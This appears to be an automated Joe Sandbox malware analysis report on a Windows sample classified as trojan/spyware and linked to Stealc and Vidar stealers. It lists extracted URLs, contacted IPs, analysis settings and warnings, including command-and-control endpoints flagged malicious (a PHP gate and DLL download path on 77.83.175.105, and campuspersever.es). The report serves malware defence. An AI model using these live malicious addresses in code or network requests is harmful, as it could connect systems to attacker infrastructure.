                                                                                                                                          https://www.deezer.com/7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drfalse
                                                                                                                                            		unknown
                                                                                                                                            https://www.youtube.com/?feature=ytcachrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icormatchrome.exe, 00000002.00000003.2185983143.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154158801.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://i.ihwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://issuetracker.google.com/255411748msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://campuspersever.es/&hwWxZRwpeL.exe, 00000000.00000002.2605979506.0000000021160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://web.telegram.org/7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://i.ibhwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://anglebug.com/7246chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://anglebug.com/7369chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://anglebug.com/7489chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://i.ibb.co/JK?hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://chrome.google.com/webstorechrome.exe, 00000002.00000003.2127412761.00002B4400D1C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000002.2323860867.000046280017C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://drive-daily-2.corp.google.com/manifest.json0.9.drfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://polymer.github.io/PATENTS.txtchrome.exe, 00000002.00000003.2133633558.00002B4401264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133191790.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131752196.00002B4400F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133429420.00002B440041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133633558.00002B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133154762.00002B4400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131617079.00002B44010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131395309.00002B4400F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133219370.00002B4400FC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131870638.00002B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131687525.00002B4401124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133101867.00002B4400CD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000002.00000003.2185983143.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154158801.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, Web Data.9.dr, AEBGIEGC.0.dr, CFCGIIEH.0.drfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://issuetracker.google.com/161903006msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://77.83.175.105/18a9a962225b1ffb.phpition:hwWxZRwpeL.exe, 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://www.ecosia.org/newtab/hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, CFCGIIEH.0.drfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://drive-daily-1.corp.google.com/manifest.json0.9.drfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://excel.new?from=EdgeM365Shoreline7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://www.youtube.com/chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://drive-daily-5.corp.google.com/manifest.json0.9.drfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://cdnjs.cloudflare.com/ajax/libs/device.js/0.2.7/device.min.jsECAFHDBGHJ.exe.0.drfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://docs.google.com/spreadsheets/chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2156240401.00002B44016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2158492197.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://77.83.175.105/4db719b1f2f948b0/msvcp140.dllmhwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://anglebug.com/3078chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://anglebug.com/7553chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://anglebug.com/5375chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://anglebug.com/5371chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://anglebug.com/4722chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLhwWxZRwpeL.exe, 00000000.00000003.2492924259.0000000021422000.00000004.00000020.00020000.00000000.sdmp, JKJKJJDBKEGIECAAECFHCFBGIJ.0.drfalse
                                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://anglebug.com/7556chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refhwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://chromewebstore.google.com/msedge.exe, 00000007.00000002.2323860867.000046280017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.9.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://drive-preprod.corp.google.com/manifest.json0.9.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.drfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://chrome.google.com/webstore/manifest.json.9.drfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://77.83.175.105/18a9a962225b1ffb.phpop:hwWxZRwpeL.exe, 00000000.00000002.2610154888.0000000027EE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                https://i.ibb.co/LDF99J2/brave-logo.pngECAFHDBGHJ.exe.0.drfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://anglebug.com/6692chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      https://issuetracker.google.com/258207403msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        http://anglebug.com/3502chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          http://anglebug.com/3623msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            23.221.22.120
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                            20.125.209.212
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                            162.159.61.3
                                                                                                                                                                                                                            		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            142.250.186.78
                                                                                                                                                                                                                            		plus.l.google.comUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            23.222.241.148
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                            142.250.184.193
                                                                                                                                                                                                                            		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            23.47.194.66
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                                                            		unknownReserved
                                                                                                                                                                                                                            		unknownunknownfalse
                                                                                                                                                                                                                            20.75.60.91
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                            142.250.186.100
                                                                                                                                                                                                                            		www.google.comUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            23.218.232.168
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		24835RAYA-ASEGfalse
                                                                                                                                                                                                                            87.106.236.48
                                                                                                                                                                                                                            		campuspersever.esGermany
                                                                                                                                                                                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                                                            152.195.19.97
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15133EDGECASTUSfalse
                                                                                                                                                                                                                            108.156.211.71
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                            77.83.175.105
                                                                                                                                                                                                                            		unknownUkraine
                                                                                                                                                                                                                            		204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLtrue
                                                                                                                                                                                                                            20.189.173.16
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                            204.79.197.219
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                            172.217.18.110
                                                                                                                                                                                                                            		play.google.comUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            4.152.133.8
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		3356LEVEL3USfalse
                                                                                                                                                                                                                            13.107.246.57
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                            94.245.104.56
                                                                                                                                                                                                                            		ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                                                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                            18.239.83.91
                                                                                                                                                                                                                            		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                            		16509AMAZON-02USfalse

                                                                                                                                                                                                                            Private

                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                            192.168.2.5
                                                                                                                                                                                                                            127.0.0.1

                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1544133
                                                                                                                                                                                                                            Start date and time:2024-10-28 22:01:08 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 8m 26s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:25
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:hwWxZRwpeL.exe
                                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                                            Original Sample Name:ae721f6a78bdd19999a514e3f1ba8053.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@68/307@27/24
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                            • Number of executed functions: 91
                                                                                                                                                                                                                            • Number of non-executed functions: 136
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 142.250.185.67, 216.58.212.142, 64.233.184.84, 34.104.35.123, 216.58.206.67, 142.250.186.138, 216.58.212.170, 142.250.185.202, 216.58.206.42, 142.250.185.106, 142.250.185.138, 142.250.185.234, 142.250.185.74, 142.250.181.234, 172.217.16.138, 172.217.23.106, 216.58.212.138, 142.250.186.42, 142.250.185.170, 172.217.18.106, 142.250.186.74, 172.217.16.202, 142.250.184.202, 142.250.74.202, 172.217.18.10, 142.250.186.170, 142.250.186.106, 93.184.221.240, 192.229.221.95, 142.250.185.174, 204.79.197.203, 13.107.21.239, 204.79.197.239, 13.107.42.16, 13.107.6.158, 2.19.126.205, 2.19.126.208, 172.205.25.163, 88.221.110.195, 88.221.110.179, 2.23.209.150, 2.23.209.130, 2.23.209.185, 2.23.209.189, 2.23.209.179, 2.23.209.182, 2.23.209.133, 2.23.209.149, 2.23.209.158, 2.23.209.161, 13.74.129.1, 204.79.197.237, 13.107.21.237, 23.38.98.87, 23.38.98.106, 23.38.98.100, 23.38.98.95, 23.38.98.86, 23.38.98.99, 23.38.98.91, 23.38.98.92, 23.38.98.93, 48.209.180.244, 52.168.117.173, 199.232.21
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, prod-agic-ne-6.northeurope.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, prod-agic-ne-9.northeurope.cloudapp.azure.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, edgedl.me.gvt1.com, c.bing.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.l.google.com, config.edge.skype.com.traffi
                                                                                                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                            • VT rate limit hit for: hwWxZRwpeL.exe

                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            17:02:53API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            20.125.209.212file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                W9f3Fx6sL4.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                        http://google.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          https://web.kamihq.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            https://app.scalenut.com/creator/d0ab8cf4-bc58-4dd4-a63c-fdc95e54322f/kj8jd9r9doGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                              https://myworkspace10fa5.myclickfunnels.com/onlinereview--00e63?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                162.159.61.3file.exeGet hashmaliciousStealc, VidarBrowse
